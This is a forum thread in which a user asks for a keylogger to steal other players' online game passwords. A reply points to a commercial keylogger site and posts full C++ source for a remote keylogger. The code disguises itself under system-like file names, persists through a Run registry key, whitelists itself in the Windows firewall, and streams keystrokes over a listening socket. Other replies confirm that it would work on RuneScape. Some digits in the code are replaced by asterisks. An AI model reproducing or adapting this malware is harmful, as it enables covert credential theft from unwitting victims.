monitor file activity
+ Reply to Thread

Thread: HElp plzz

HElp plzz

im new 2 this but i gotta start sumwhere. anywayz, i would like some help on getting a keylogger so i can get other people usernams and passwords for an online game

n00b Hack*r...

here

[url]www.spyarsenal.com[/url]

This is a good site with many tools, and keyloggers. I recommend Golden Keylogger, because it will email you reports.

Also here is the code for a keylogger (posted by ~~smart~fool~~, but written by NerveThraX) that can remotely log keystrokes on a computer provided port *80 on there computer is open. It can also work on your computer as well.

Code:
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    *                                                                              *
    *  Name: Remote Logger  V0.*                                                   *
    *  Author: NerveThraX                                                          *
    *  Date: *0/07/06 *6:5*                                                        *
    *                                                                              *
    *  A remote key logger that logs the keystrokes of a remote or local machine.  *
    *  The keylogger starts a telnet server on port *80 of the remote host.        *
    *  This program is for educational purpose only. I am not responsible for any  *
    *  damage this program might cause nor I am responsible how this program is    * 
    *  used.                                                                       *
    *  To access the key loggers remote features you will need to do the following.*
    *  start -> run -> telnet <ipaddress_victim> *80                               *
    *  Now you wil be able to view the live feed of key strokes of the remote      *
    *  machine.                                                                    *
    *  You can also use the key logger to log the keystrokes of a local machine,   * 
    *  since it keeps all keystrokes in a central file called log.txt in the       *
    *  windows root directory. The key logger also paralyzes the windows firewall  *
    *  so that no warning is message is made when the listing server is running,the* 
    *  key logger also alters the reg keys so that it runs at every reboot.        *
    *  This program is free software; you can redistribute it and/or               *
    *  modify it under the terms of the GNU General Public License                 *
    *  as published by the Free Software Foundation.                               *
    *******************************************************************************/

/*
    The source code is compiled in Dev-C++ 4.*.*.2 linked to the ws2_*2.lib library.
    The key logger seems to work stable in Windows XP Home/Pro Sp2, the key logger
    also should work in Windows NT and 2000. You will want to choose a windows project
    instead of a console project.
    */

#include <windows.h>
    #include <winsock.h>
    #include <stdio.h>
    #include <iostream>
    #include <fstream>
    #include <ctime>
    #include <cstdlib>

using namespace std;

#define MAX *024

void win_firewall(char* display_name);

int main()
    {
    char system[MAX];
    char pathtofile[MAX];

const char *name[] = {"\\LiveUpdate.exe", "\\WindowsSpooler.exe", "\\TelnetClient.exe",
                          "\\Microsoft.exe", "\\Sp2Firewall.exe", "\\regedat.exe",
                          "\\ieexplorer.exe", "\\Explorer.exe", "\\windowsClient.exe",
                          "\\MCAGENT.exe", "\\MCUPDATE.exe", "\\MFW2EN.exe", "\\MFWENG*.exe",
                          "\\MGUI.exe", "\\msconfig.exe", "\\MINILOG.exe", "\\MOOLIVE.exe", "\\MRFLUX.exe",
                          "\\MSCONFIG.exe", "\\MSINFO*2.exe", "\\MSSMMC*2.exe", "\\MU0***AD.exe",
                          "\\NAV80TRY.exe", "\\NAVAPW*2.exe", "\\NAVDX.exe", "\\NAVSTUB.exe",
                          "\\NAVW*2.exe", "\\NC2000.exe", "\\NCINST4.exe", "\\NDD*2.exe",
                          "\\NEOMONITOR.exe", "\\NETARMOR.exe", "\\NETINFO.exe", "\\NETMON.exe", 0};

srand(time(0));
    int random = rand() % *5;
    name[random];

/* Finds the windows directory and copies the key logger*/
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
    GetSystemDirectory(system,sizeof(system));

strcat(system,name[random]);
    CopyFile(pathtofile,system,false);

/*Adds the reg key*/

HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
    RegSetValueEx(hKey, "Microsoft Windows Sp2 Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
    RegCloseKey(hKey);

ofstream gen("log.txt");
             gen.close();               
    win_firewall("Microsoft Update");

/*starts the listing server on port *80*/
      WSADATA wsaData;
      WSAStartup(MAKEWORD(*, *), &wsaData);
      SOCKET hServer  = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      SOCKADDR_IN sai;
      sai.sin_family = AF_INET;
      sai.sin_addr.s_addr = INADDR_ANY;
      sai.sin_port = htons(*80);
      bind(hServer,(LPSOCKADDR)&sai,sizeof(struct sockaddr));
      listen(hServer,*0);
      SOCKET hClient =  accept(hServer,NULL,NULL);

char szBuffer[MAX_PATH];
      char szKey[MAX_PATH];
      int uScanCode;

ofstream cvg("log.txt" , ios::app);

while(*)
      {

for(int i = 0; i < 256; i++)
          {   
              /*gets the key***rd input*/
             if (GetAsyncKeyState(i) == -*2767)
                {                                     
                 uScanCode  =  MapVirtualKeyEx(i,0,GetKey***rdLayout(0));           
                  GetKeyNameText(uScanCode << *6,szKey,MAX_PATH);
                 if(strlen(szKey) > 0)
                   {
                     strcpy(szBuffer,"["); strcat(szBuffer, szKey); strcat(szBuffer,"]");                 
                     send(hClient,szBuffer,strlen(szBuffer),0);/*sends the key strokes*/

/*writes to the log.txt file*/
                     if(cvg.is_open())
                     {
                      cvg << szBuffer;
                      }

}                               
                }     

}           
    }
      closesocket(hClient);
      closesocket(hServer);
      WSACleanup();
      cvg.close();
    }

void win_firewall(char* display_name)
    {
         /*adds itself to the windows firewall exceptions list*/
        char path[MAX_PATH];
        HMODULE ModH = GetModuleHandle(NULL);
        GetModuleFileName(ModH, path, sizeof(path));
        char data[MAX_PATH] = "";
        strcpy (data, path);
        strcat (data, ":*:Enabled:");
        strcat (data, display_name);

HKEY hKey;
        RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet00*\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, KEY_SET_VALUE, &hKey);

RegSetValueEx(hKey, path,0,REG_SZ,(const unsigned char*)data,sizeof(data));
        RegCloseKey(hKey);
    }__________________
    7h* l**t*s7 c4nt h4ck m*!

thanks alot. So would this work on runescape ???

yeah

They (the SpyArsenal Golden Keylogger and the coded one) log all keystrokes, regardless of where they are entered.

will you runescape bastards get the hell out of here please.
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ®µÑȧ©ÅÞË

If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

Lol, yeah, I agree, but since he was asking for a keylogger, I reffered him to one. I also happen to be a proud RuneScape-quitter!! I was level 78 before I decided to quit trying to be zezima, lol.

hey shut up man its up2 me what i wanna use it for not you so go bitch bout summin else

+ Reply to Thread